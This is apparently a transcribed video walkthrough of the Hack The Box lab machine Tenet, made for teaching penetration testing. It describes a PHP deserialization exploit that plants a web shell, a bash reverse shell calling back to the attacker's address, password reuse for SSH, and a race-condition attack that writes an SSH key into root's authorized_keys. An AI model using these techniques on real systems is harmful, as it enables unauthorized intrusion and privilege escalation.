What's going on YouTube? This is Ipsac and we're doing Tenet from HackTheBox, which was on the easier side of medium machines. It starts off with finding a WordPress site and doing some light enumeration around WordPress. You don't really find anything too interesting there. There's no like vulnerable plugins, nothing to really brute force. You just have two usernames and some comments on the site. Reading one of the comments hints at a file Sator.php existing on the server as well as a backup for it. So you find the .bak of that file and discover Sator.php is just a poorly written PHP script that for some reason uses serialization to move a file. So you create a custom PHP deserialization gadget to exploit that and get a shell on the box. With a shell, you can enumerate the WordPress config, find out the WordPress password is the password of one of the local users on the box, Neil, log in as Neil, and see he can sudo and run a bash script, which has a race vulnerability that allows you to write a SSH key. Now, we're going to do this exploit two different ways. We're going to first brute force and just write all the files and eventually just win that race. And the second one, we're going to do it a more elegant way and use inotify to create a hook in the file system to notify us when files are created. And then upon file creation, trigger a write. So with all that being said, let's jump in. As always, we start off with the nmap, so -sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory, and then we'll call it Tenet, and then the IP address of 10.10.10.223. I'm also going to add -v so it shows me open ports as it finds them, and right off the bat we have 22 and 80, so I'm going to go to 10.10.10.223, and we see it's just the Apache 2 default page. I'm going to specify like robots.txt to see if we have anything here, and we don't. So the next thing I want to do is just see if there's like a PHP file. So I'm going to do index.html to confirm that's this page. We can try .php and we don't see anything. So the next thing I'm going to do is run a GoBuster. So I'm going to do GoBuster, dir for dir mode, -u for URL, http 10.10.10.223, -w for word list, opt, sec list, then we want to do discovery, web content, raft small words, and we want to specify out file of gobuster.out, and I didn't specify actually small words.txt, and I didn't specify any extensions because I don't know what type of web server this is. If I knew it was a PHP thing, I'd try the extension of .php, and if this comes up with nothing, I may try extensions of like txt and pdf, things like that. But we do get a hit right off the bat saying it is WordPress. So let's go to 10.10.10.223/WordPress. And we don't really have anything here. We do have recent comments and posts and things, but it doesn't look like a WordPress page. And that's because WordPress likes doing absolute URLs everywhere. So we can see it's trying to link to Tenet.htb, which doesn't exist. We have to create that in our host file. So let's do sudo vi etc host, and then we can do 10.10.10.223 tenet.htb. And now when we view the source, we get a page. So now if we go to tenet.htb, we should see the WordPress page. So going here, we do now get a pretty page. Going to the bottom, we can see proudly powered by WordPress. We can also go to wp-admin and try like admin to log in. The other thing we could do, I like checking like wp-content and seeing if there's index.html files here or something blocking it. If directory traversal is on in WordPress, or if there's no like index file in these directories, you can just enumerate WordPress really easily by going like wp content plugins and then looking at all the files here. But it looks like they have an index file, so we can't see these directory listings. So to enumerate this, I'm going to use wpscan. So wpscan-h, and we want to do --url. The detection mode I like doing as aggressive. It's going to make this take longer, but I find it to be a lot more reliable. The passive mode is going to try to crawl the WordPress page, look at the source code, and enumerate plugins that way. Whereas aggressive is just going to go to WP content plugins and then the plugin name and see if that returns something. So maybe ASCII-met is a normal plugin. I forget the normal plugins that it can check, but if it gets 404, obviously there's no plugin there. If it gets something, then there is a plugin. So that's why I like aggressive mode. And the last flag I normally do is the enumerate option, and I always do all plugins. You could just do vulnerable plugins, but if you've ever looked at just WordPress plugins in general, you can get a lot of CVEs to your name because there's just a lot of plugins and not many researchers looking at them. So you may find a plugin that's installed that has easy vulnerabilities you can find. So I just like doing all plugins. So let's do wpscan --url http tenet.htb-w for word list, or not w -e to enumerate all plugins, and then we can do plugins -detection aggressive, and then I always like saving to out file, so wpscan.out, and we'll let that go. We can do some manual enumeration of WordPress if we wanted to. So for example, let's do tenet.htb. If we open up a post, we can see the authors, so we can get usernames potentially of WordPress. We can also enumerate this. So if you use this pretty like URL rewrite of /author/name, you can't really do anything. But all that is doing is it's a wrapper around this author parameter on index.php, and with this we can specify IDs. So numbers are much easier to guess or brute force than full names. So author equals 1, and it's going to redirect us to /author/protagonist. So if I just do this curl request, curl 10.10.10.223/ author equals 1. What? Maybe I need -I to do a header. Oh, it's virtual host. We have to specify tenet.htb and not the actual IP address. So curl tenet.htb/author equals 1. Maybe -I, so we can see the header. We can see location, and that directs us here. So we can quickly go through this and see if it links us anywhere. And we don't have any other authors. There are 2 users on this box. If you remember when we just hit this without the host name, we saw comments, and we saw a user called Neil. So if we go all these posts, we can see there is this comment, and the reason why he's not showing up is he doesn't have a blog post. This author thing only works if the person had a blog post. If they don't, you don't get them. So this page just shows all the posts by a user. And we can see him saying, did you remove the Sator.php file and backup? The migration program is incomplete. Why would you do this? So the very first thing I want to do is just check if sator.php exists, and we get a 404 not found, and I'm going to do 10.10.10.223, and we get a 200 OK. So it doesn't exist in WordPress. So if we go to tenet.htb, we get directed in this directory, but if we just do 10.10.10.223, we get directed here, which is one directory up, and that's where the Sator.php file lives. And we can see grabbing users from text file database updated. If we go through all these posts, let's go tenet.htb and read them. So they're coming soon, watch the space, so nothing really there. They're moving the data to a flat file structure to something a bit more substantial. Please bear with us. And this is where the person commented saying, did you remove this file? I don't know why he's asking, did you remove it? He can just check, we checked. But yeah. And then we have looking for beta testers for new time management software, Rotis, which is just a Sator backwards. Will hopefully be in the market late, QA, whatever. So we have the Sator.php file. And the comment said, did you remove it and its backup? So generally how I search for backups now is I just like using GoBuster. So if I do vi words, we can just do Sator, just do this. And I'm going to do GoBuster dir, and we can do -h. And if we look, discovery is -d, discover backup. And this is something I put in to GoBuster. If we go to ipsec.rocks, let's see, GoBuster discover. I think we did it in player, yeah. So if you want to see how we edited the code to add this into GoBuster, it's the player video. So I think so. Discover directories. Yeah. So what this is going to do is a lot of permutations on backups. So most things will just like add .bak, .php to things like that to it, but this will prepend something. So if it takes Word, it may add period, then .swp to look for vim swap files. So that's what I'm going to do with this. So GoBuster dir-u for URL, http 10.10.10.223-w for word list, and we can just say words, and then -d for discover mode. And we have to do -x for PHP because our words only has Sator, not Sator.php. And we can see it has discovered Sator.php and Sator.php.bak. So if we go take a look at the .bak, we can save it and then move, download Sator.php.bak. We can see what it's doing. I'm not exactly sure what the purpose of this is other than to be vulnerable, but we have a class that is taking the user file users.txt, no data, and then updating the database. And then we have this destruct gadget of file put contents, and then it's just calling update db. Why didn't it just do like an fopen and fwrite? No idea. That would have been much more secure. Like there's no reason to do serialization around here. But let's go, and if you don't know about PHP serialization, again, go to ipsec.rocks, type in PHP serial, and we can have advanced PHP and introduction to PHP deserialization here. So this is a relatively simple one. I'm just going to less this so I can copy. We just want to copy this, I believe. We can copy this line. So I'm going to do vi pwn.php, and then we just do pwn is equal to new database export. So we create a new object of this, and we just echo, then serialize pwn. So if I php pwn.php, we have a serialized object. Now we can put anything we want. So our file name, we're going to create ip.php, and the data is just going to be $php system, and then we can do request cmd. We already use single quotes like that. So we have this, which is a serialized object. Going back to the backup, we can see what it's going to do. So input is equal to get a repo, and if a repo is not set, it's going to do nothing. So input is nothing if this variable is not set. Database update is equal to unserialized input, and this is where we're going to do the vulnerability. We put our object here, which is going to be the database export, and we're going to specify the username and data, and then when this object gets terminated or destructed, it's going to call this function. And it's going to probably get destroyed right after this call right here. And it's going to do file put contents, user file, which we called ip.php, and this data is going to be the contents, which we put a PHP shell. So all we have to do is copy this. So if we copy, and then we go to, let's see, where is the backup? Sator.php. We can say a repo is equal to this object, and it did a second database updated line. And if we just curl 10.10.10.223/ip.php, we don't get 404. If we tried does not exist, we have curl responding with 404, but nothing here. I can do cmd equals ID, and that did not work. 10.10.10.223 ip.php, and then question mark cmd equals who am I. So we have an error in our code. So let's go v.pwn.php. So let's see, php system, and then request cmd. That should work. 1 to terminate it. Wait. Oh. I have an extra parentheses. So let's do this again. So copy. And then 10.10.10.223 Sator.php. A repo is equal to the new object. Refresh this page, and we have command execution. Now, if I did not spot that by eye, what I would have done to troubleshoot this is I put this in a file. So let's do make dir dub, go into this, vshell.php, paste. I'm going to put this error message back in, and then php-S 127.0.0.1:80, I think, sudo. And now I have a PHP web server standing on my box. So if we go to 127.0.0.1, it's not found. We called it shell.php. And we can see the error message unexpected parenthesis. So that's how I would have troubleshooted that if I didn't spot it by eye. So let's go back here. We have cmd equals who am I. So I'm going to do bash-i. Actually, we can type the reverse shell here. Bash-c, bash-i, dev tcp 10.10.14.2, port 9001, and 0 at and 1, like that. And this should be good for a reverse shell syntax. So copy, nc lvmp 9001, paste this here, and we don't get a callback. So again, I'm just going to run this here, and we get a shell. So what is happening here probably is some type of URL encoding. So I'm going to open up Burp Suite, and we're just going to throw it into repeater. So we don't have any chance of it doing URL encoding. And I'm actually going to convert this into a post request because there's less bad characters in a post request. So if I do proxy intercept is on, we can go repeater, burp suite, cmd, like that. And then send this over. We can paste this. I can highlight this and do Control U to see if it would work if I just URL encode it in burp. So if we do this, send, we get a shell. So it's some type of URL encoding our browser is doing. I'm not sure what it is, but if we just manually do it in burp, it works. So we have a shell. I'm going to do Control Z, actually FG. First we have to do Python 3-C import pty.spawn bin bash. And then Control Z stty raw minus echo fg enter. You won't see yourself typing, but it will be typing. You just have to trust. And we have shell on this box. So the very first thing I like doing is going into the web configuration and pulling the database password. So wp-config.php. And we could, let's see, where is it? So name is WordPress, user is Neil, and password is Opera2112. So we could do MySQL-u Neil, I think it's like that, -p, paste the password, show databases, I think it was WordPress, yeah, use WordPress, and enumerate the database manually. So we can do show tables, select stir from WP users. We could just do select ID, user login, and user pass from WP users. And try to crack this with hashcat. The other thing we could do is just try SSHing with the credential. So SSH Neil at 10.10.10.223. Yes. And paste the password. So we get in. You could also probably try logging into WordPress with that. So if we do Tenet.htb wp admin, and then what is it? Neil. It's probably on Burp Suite. So turn off. Neil, paste. Is it? So that's not his WordPress password. So we could try cracking those, but we already got SSH with him. So doing sudo-l, we can see he can run this program enableSSH.sh with sudo. So what I'm going to do is just clear that session out. And let's take a look at enableSSH. So this is running as root, and we have a function check added, check file, add key. And add key is going to make a directory, make a file, ssh- random string. And that's going to touch that file. Okay. So here it generates a /temp/ssh- random 8 characters, let's say. Then it's going to set umask 110, which means it's going to make every new file, the permission is going to be 667 because umask is a inverse. So you just take 777 and subtract it here. So this should be 667 permissions. We'll have to verify that when it gets created. It's going to echo key into temp name, and temp name is going to be this, and key is going to be this. And that's going to run check file, and then if it is a valid key, I'm guessing, it's going to cat it into root's SSH authorized keys. So if we look at what check file is, just make sure the file exists. So there is a race condition here. When this file gets created, and then this check file command is being ran, if we replace the contents of this file, then it will go into this authorized key. So we can do that 2 different ways. One way is just through sheer brute force, which we'll do first. So I'm going to go into the temp directory, and we're just going to write a loop. So vi brute.sh, and we can say while true, do. So this is just an infinite loop. And we can say for file in ls, do. So it's going to keep running this ls command and loop through every file, and that would be the name. And we can say if then file is equal to ssh. So if it begins with ssh, that's our thing. Then echo, we want to put something into that file, which is our key. So I'm going to do sh keygen -f. We'll just call it Tenet cat ID or Tenet.pub. We just want to put our SSH key here. So echo key to file. And then we end the if then, end that, and end that loop. So all this is doing is running ls and /temp, and if the file ever begins with SSH, then it's going to overwrite that. So let's do bash. Well, first we have to have 2 sessions. So I'm just going to run tmux here, and we'll have a nested tmux session. So I can do SSH, or not SSH, bash brute.sh, and then we can run sudo enableSSH.sh, and error adding root at Ubuntu to authorized key file. Successfully added. So it is a race condition. So Sometimes it may not work, but looks like that time it did. Let's now try to SSH. So chmod 700 Tenet. So we got to change the permissions of this private key. sh-i tenet root at 10.10.10.223. It's taking its sweet time, and we get in. So that is a very sloppy way to do this. There is a much better way, and that's through using inotify. So by that, I mean hooking into the file system of Linux and being notified when there's a change, which is better because you don't have to constantly loop over the directory doing an ls waiting for a file to be created. You just hook the file system and say, hey, notify me upon new files. So you could do this through Python, but the Python needs to have the inotify bindings or libraries installed, and it doesn't. So we're going to do it the quote unquote harder way and just do it through a C program. So I'm just going to go over to Google and do C inotify, if I can type, example. And let's see, there's probably a good post. I'm going to check these two sites. This one explains a lot, but I didn't like this example because it wasn't doing a forever loop. It just does it upon one event. I think this one does it a bit better. Yep. So I like this one better. So we're going to grab this source, walk through it a little bit. I'm sure if you read this post, it'll make more sense. But for video's sake, we're just going to go over it. So let's let's call this pwn.c, and then set paste and paste this code. So we're just doing a standard libraries that we're including. I'm going to collect up to 1024 events, whatever. So this sig handler is just watching us for control C to see when the program closes. And when it closes, it's going to do inotify remove watch and the file descriptor and watch descriptor. So it's just going to close it and exit gracefully. So our program, let's see, care, path to be watched. And then we're going to start the signal handler so we can see when the program closes. And path to be watched is going to be the very first argument. So when we execute this, we just put /temp. Then we initialize inotify. That's going to be file descriptor. It's checking for errors right here. Then we're adding the watch. So wd inotify watch. And then saying in modify, in create, and in delete. And these variables are populated by one of these headers, probably the inotify.h. Let's check that real quick. Locate sys/inotify.h. Where is this? It's probably user, yeah, include sys like this. And what was it? We're looking at, let's just search for in modify, and we can see all the things we could potentially do. Access, modify, attribute, close write, close without a write, just to close, open, moved from, move to, move, create, delete, delete self, and this. So all these are actions we can hook into. The main one we just want is create. And they've already done that code for us. So let's just go back to the code here, and we can see what is happening. Right here is where they add the watch. Again, we could delete, modify, and delete, but if we did, we'd probably have to delete some code down here, so I'm going to leave it. We have watch descriptor -1, so this is just checking for errors. If there is no error, say it's going to be watching the directory. And then we have a infinite loop while 1, so this is just going to keep the program open. Int I = 0 and length, char buffer. This is going to read, so anytime we get data. And while the length is greater than I, I'm guessing this means we have an event, then we're going to process the event. And if the event is in create, doesn't look like we're, if it is a create event, then we're going to check if it is a directory and say a directory was created. And if it wasn't a directory, then we're going to say a file was created. And that is pretty much all we want to do. And we can see here, it's just going to increase the event size thing, but right here is, not there. Right here is where the file is created. So let's go here, and I probably should do spaces. And we're going to have this write to the file. So to do that, we have to create the pointer. So I'm going to do fptr for file pointer. And oh man, why is Vim not doing this for me? Char, full name, and actually, yeah, I'm going to do this real quick, is equal to /temp/ because that's where we want to create the file. This event thing is only going to have the file name. It's not going to have the directory it came from, so I'm doing this so we could have that. We probably could pull it from the, let's see, was it path to be watched variable, but that may not end with a /, so I'm just going to be lazy and hard code this. And then we have to combine the event name and full name. So I'm going to do strcat full name, and then we'll do event name like that. And that should combine the two. So all we have to do now is write to a file. So file pointer is equal to fopen full name. And then we're going to open it in write mode, which will just erase the file and put our contents. If we did like WA for append, we wouldn't erase the contents. But for this, we don't want to have anything in the file except what we want. So to write to it, we're going to do fprintf, and then file pointer, which is going to be the file. And then we need our SSH key, and I'll put that in after. And then the final piece, we just want to close, so fclosed file pointer. So if all goes well, we will be able to drop our key here. And I'm not going to actually put the key, because if we did, we wouldn't know it worked because we already have our SSH key there. I can just go out of here and do that SSH-i tenet root at 10.10.10.223 because we've already exploited it once. What was that, the IP? Ping Tenet.htb. So maybe the key got erased. Maybe there's a cron to clean up. So let's cat tenet.pub and we'll put our key there to see if this works. Hopefully, like, I didn't get blocked somehow or something, but we can put our SSH key \n and then gcc to compile -o, we'll call it pwn. Let's see, it's just telling us it included string.h for us because we used strcat, and that should be fine. Do we have pwn? We do. So I'm going to move pwn into www, and we'll go here and do python 3-m http server. And then let's see, where is our Tenet shell? Right here. So from here, we can do wget 10.10.14.2 8000/pwn. And then if we run pwn, chmod +x pwn ./pwn, we have to specify /temp. So we're watching temp. So if I do sudo enableSSH, I think our C code is bad. We got a segfault. We created the file. It's successfully added. So I wonder if it wrote. Let's try this. Root. Yeah, it worked. I'm not sure exactly where our code failed though. v ... Can I see it real quick? Pwn.c. Let's see, fclose. File was created, so we're creating the pointer. I'm not sure exactly. Maybe we have to delete the pointer. Let's try running that again real quick. Yeah, it segfaults every time. So I guess let's just recompile it and test please subscribe real quick. So please subscribe. Like that. GCC pwn -o pwn. Let's download this again. Run wget chmod plus x pwn.1 /temp enable. So we segfaulted, but that is fine. We kind of expected that because all we want to do is look at the authorized key file and see if please subscribe is there. And it is. So we have confirmed we are indeed exporting this with inotify. So hope you enjoyed that. And I guess the very last piece I want to do is verify that umask setting. So let's do which enableSSH. It's in here, so we can vi this file. And I'm going to get rid of this rm. So now when we call enableSSH, it's going to leave the file in temp, and we'll see if it's 667. So if we do ls, let's see, SSH. I think 0 and umask may not be able to do read write execute. So it may just be 666. Well, it is 666, but if I stat SSH, we should be able to see, yeah, 666. If I touch ipsec, then stat ipsec, we can see it is 644. So the umask here would be 133 probably. So if I do umask or 022, so 0, so it's 6, and then 22, so it's going from 6. So if I change this to umask 0, or let's do 123. So now my umask is 123, and I touch ip2, and we stat ip2. You can see, umask is not working as I expected in my head. So it's probably because it can't give execute. But I'm going to stop explaining umask because I obviously was not ready to do this off the top of my head. Something so basic, but you can really mess up. So we see 124. That is 6, 4, and 2. So I'm guessing it's going from 6. No? Yeah. It just can't have the execute bit set. And I can't do the math in my head to explain it well. So if you want to know more about umask, definitely just probably do man umask. And of course the entry's not there. Is it on my box? Man umask. There we go. Read the man page. This is better explaining things than me. So hope you guys enjoyed the video. Take care, and I will see you all next week.